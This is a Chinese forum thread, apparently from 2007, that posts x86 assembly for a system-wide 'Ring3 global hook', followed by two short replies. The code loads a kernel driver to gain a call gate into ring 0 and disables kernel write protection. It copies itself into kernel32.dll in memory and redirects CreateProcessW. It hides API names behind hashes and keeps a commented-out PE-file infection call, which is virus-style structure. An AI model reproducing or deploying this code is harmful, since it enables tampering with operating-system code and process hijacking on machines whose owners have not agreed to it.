|
阅读:2535回复:2
Ring3全局HOOK.
.586p
.model flat,stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include advapi32.inc include mpr.inc include macros.asm includelib kernel32.lib includelib user32.lib includelib advapi32.lib includelib mpr.lib include ring0.inc RoutineSize = offset RoutineEnd-offset RoutineStart .code RoutineStart: _NewStart: invoke LoadLibrary,CTXT("kernel32.dll") mov ebp,eax call @F @@: pop ebx sub ebx,offset @B ;Give me the address of Api lea esi,FunctionNameTab[ebx] lea edi,FunctionAddressTab[ebx] @@: lodsd push eax push ebp call _GetProcAddress stosd cmp dword ptr [esi],0 loopnz @b invoke LoadLibrary,CTXT("user32.dll") invoke GetProcAddress,eax,CTXT("MessageBoxW") mov dwMessageBoxW[ebx],eax ;Enter Ring0 call _OpenSys call fword ptr [Callgt][ebx] mov eax,esp ;save ring0 esp mov esp,[esp+4];->ring3 esp push eax mov eax,cr0 push eax btr eax,16 mov cr0,eax mov edx,dwCreateProcessInternalW[ebx] sub edx,ebp lea ecx,[edx-(300h+(offset _JmpOffset-offset RoutineStart))] mov dword ptr _JmpOffset[ebx-4],ecx lea edi,[ebp+300h] lea esi,RoutineStart[ebx] push 16 pop ecx pushad repz cmpsb popad mov ecx,RoutineSize rep movsb ;copy me to kernel32.dll mov edx,dwCreateProcessW[ebx] mov ecx,80h @@: inc edx cmp dword ptr [edx],0e8006a08h ;Get CreateProcessInternalW() loopnz @b lea ecx,[edx+8] sub ecx,ebp sub ecx,300h+offset _NewCreateProcessW-offset RoutineStart neg ecx mov [edx+4],ecx ;HOOK CreateProcessW() pop eax mov cr0,eax pop esp lea eax,@f[ebx] push eax retf @@: popad ;invoke MessageBox,NULL,CTXT("已经成功安装!"),CTXT("Success!"),MB_OK invoke ExitProcess,0 ret _NewCreateProcessW: ;My CreateProcessW() pushad call @F @@: pop edx sub edx,offset @B mov ebx,edx mov edi,[esp+20h+12] inc edi inc edi mov esi,edi push 22h pop eax mov ecx,100h repnz scasw mov byte ptr [edi-2],0 ;push esi ;call _EditFile ;infect PE file push MB_YESNO lea eax,uszMenu[ebx] push eax push esi push NULL call dwMessageBoxW[ebx] .if eax==7 ;invoke MessageBox, NULL, CommandLine, addr mdb, MB_YESNO mov edi,[esp+20h+8] ;打开进程的字符串 mov dword ptr [edi],0 .endif mov byte ptr [edi-2],22h popad db 0e9h dd 0 _JmpOffset: _OpenSys proc local hSCManager:HANDLE local hService:HANDLE local acDriverPath[MAX_PATH]:CHAR ; Open a handle to the SC Manager database invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE .if eax != NULL mov hSCManager, eax push eax invoke GetFullPathName, CTXT("sys.sys",0), sizeof acDriverPath, addr acDriverPath, esp pop eax ; Register driver in SCM active database invoke CreateService, hSCManager, CTXT("sys",0), CTXT("System",0), \ SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \ SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL .if eax != NULL mov hService, eax invoke StartService, hService, 0, NULL ; Here driver beeper.sys plays its nice melody ; and reports error to be removed from memory ; Remove driver from SCM database invoke DeleteService, hService invoke CloseServiceHandle, hService .else invoke MessageBox, NULL, CTXT("Can't register driver.",0), NULL, MB_ICONSTOP .endif invoke CloseServiceHandle, hSCManager .else invoke MessageBox, NULL, CTXT("Can't connect to Service Control Manager.",0), \ NULL, MB_ICONSTOP .endif ret _OpenSys endp _GetProcAddress proc _hModule,_ProcName ;This routine is writing by others:) pushad mov edx,_hModule add edx,[edx+3ch] mov edx,[edx+78h] add edx,_hModule mov ecx,[edx+18h] mov esi,[edx+20h] add esi,_hModule @@: push ecx lodsd add eax,_hModule xor edi,edi .repeat mov ecx,[eax] inc eax adc edi,ecx rol ecx,8 .until cl==0 cmp edi,_ProcName ;Add and compare ,maybe have bugs. pop ecx loopnz @b .if ZERO? sub esi,4 sub esi,_hModule sub esi,[edx+20h] shr esi,1 add esi,[edx+24h] add esi,_hModule lodsd movzx eax,ax shl eax,2 add eax,[edx+1ch] add eax,_hModule mov edx,[eax] add edx,_hModule mov [esp+1ch],edx .else mov dword ptr [esp+1ch],0 .endif popad ret _GetProcAddress endp dwOldEntryCom db 0,0,0,0,0 ;The OldEntry ;Section Data _SectionAddress: dd offset RoutineStart dd RoutineSize dd 18h*2 dup(0) ;New start ;WIN API的自定义编码表 FunctionNameTab: szCreateProcessW dd 074D9F4C0h szCreateFileW dd 01479946Fh szGetFileAttributesW dd 004788654h szSetFileAttributesW dd 004788660h szCreateFileMappingW dd 0E3486339h szMapViewOfFile dd 0D444401Dh szUnmapViewOfFile dd 0A6131C00h szGetFileSize dd 01E92925Ch szGetFileTime dd 01286865Dh szSetFileTime dd 012868669h szGetFileType dd 02599996Dh szCloseHandle dd 027969D71h szCreateProcessInternalW dd 0B51A3504h szLoadLibraryA dd 07DDF0CDCh szOpenProcess dd 050B5B28Bh szVirtualAllocEx dd 062D4C5D2h szLocalFree dd 051B4BEA3h szGetProcAddress dd 05ED2C494h dd 0 FunctionAddressTab: dwCreateProcessW dd 0 dwCreateFileW dd 0 dwGetFileAttributesW dd 0 dwSetFileAttributesW dd 0 dwCreateFileMappingW dd 0 dwMapViewOfFile dd 0 dwUnmapViewOfFile dd 0 dwGetFileSize dd 0 dwGetFileTime dd 0 dwSetFileTime dd 0 dwGetFileType dd 0 dwCloseHandle dd 0 dwCreateProcessInternalW dd 0 dwLoadLibraryA dd 0 dwOpenProcess dd 0 dwVirtualAllocEx dd 0 dwLocalFree dd 0 dwGetProcAddress dd 0 dwMessageBoxW dd 0 uszMenu equ this byte UNICODE_STR <Process will be Creat,Continue?> dd 0 ;szGetLastError db 'GetLastError',0 szVersion db 'VER1.0',0 szNtdll db "Ntdll.dll",0 ;szZwOpenSection db "ZwOpenSection",0 ;szZwClose db "ZwClose",0 szadvapi32 db "advapi32.dll",0 ;szGetSecurityInfo db "GetSecurityInfo",0 szCURRENT_USER db "CURRENT_USER",0 ;szSetEntriesInAclA db "SetEntriesInAclA",0 ;szSetSecurityInfo db "SetSecurityInfo",0 Callgt dd 0 dw 353h GdtLimit dw 0 GdtAddr dd 0 mapAddr dd 0 align 4 objname dw objnamestr_size,objnamestr_size+2 objnameptr dd 0 objnamestr equ this byte UNICODE_STR <\Device\PhysicalMemory> objnamestr_size equ $-objnamestr align 4 ObjAttr db 24 dup (0) RoutineEnd: invoke ExitProcess,0 end RoutineStart |
|
最新喜欢: wingma...
|
|
沙发#
发布于:2007-05-30 11:17
附件中sys.sys居然说是ring3hook.
最好还是有代码,比较有说服力。 |
|
|
板凳#
发布于:2007-06-08 11:18
sys.sys安装一个callgate而已~~
|
|
|
